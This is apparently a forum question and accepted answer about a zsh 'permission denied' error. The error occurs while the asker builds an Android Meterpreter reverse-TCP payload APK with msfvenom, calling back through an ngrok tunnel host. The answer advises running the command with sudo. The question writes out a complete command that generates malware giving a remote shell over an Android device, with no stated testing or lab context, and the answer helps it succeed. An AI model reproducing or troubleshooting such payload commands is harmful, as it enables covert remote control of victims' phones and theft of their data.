# is there any solution for zsh permission denied problem

Tags: linux

i am trying to make a payload for android using (**msfvenom -p android/meterpreter/reverse_tcp LHOST=6.tcp.ngrok.io LPORT=10081 R > /root/Desktop/bappy.apk**) this command. but whenever i am trying to run it this message is coming
(**zsh: permission denied: /root/Desktop/bappy.apk**)
what should i do now?

Answer (score 1, accepted):

By default, your user not have root permissions, so you need to execute your command as the root user instead.

The way this is done is by adding `sudo` before your command. Sudo will prompt you for a password, and then run your command as root.

If you are interested, you can read about the `sudo` command [here](https://man7.org/linux/man-pages/man8/sudo.8.html).